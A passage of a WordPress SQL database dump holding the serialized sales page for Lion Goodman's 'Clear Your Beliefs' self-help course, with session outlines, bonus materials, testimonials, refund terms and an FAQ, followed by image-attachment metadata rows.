class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n	<strong>=> <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n	<strong>=> <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n	<strong>=> <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n	<strong>=> <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n	<strong>=> <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n	<strong>=> <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n	<strong>=> <em>Professional Coaching Sessions:</strong> </em> Optional.\n\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(2016, 2244, '_edit_lock', '1460706169:2'),
(2017, 2244, '_edit_last', '2'),
(2018, 2244, '_wp_page_template', 'default'),
(2019, 2244, 'rt_custom_css', ''),
(2020, 2244, 'panels_data', 'a:0:{}'),
(2021, 2258, '_wp_attached_file', '2016/03/Global-Belief-Relief-banner.jpg'),
(2022, 2258, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:600;s:6:"height";i:150;s:4:"file";s:39:"2016/03/Global-Belief-Relief-banner.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"Global-Belief-Relief-banner-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:38:"Global-Belief-Relief-banner-300x75.jpg";s:5:"width";i:300;s:6:"height";i:75;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:39:"Global-Belief-Relief-banner-220x150.jpg";s:5:"width";i:220;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:39:"Global-Belief-Relief-banner-400x150.jpg";s:5:"width";i:400;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:39:"Global-Belief-Relief-banner-170x150.jpg";s:5:"width";i:170;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:11:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";s:11:"orientation";i:0;}}'),
(2023, 2260, '_wp_attached_file', '2016/03/Global-Belief-Relief-banner1.jpg'),
